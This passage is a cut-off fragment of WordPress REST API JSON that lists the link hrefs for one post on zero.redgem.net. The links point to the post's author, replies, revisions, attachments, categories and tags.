.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=31887"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/31887\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=31887"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=31887"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=31887"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}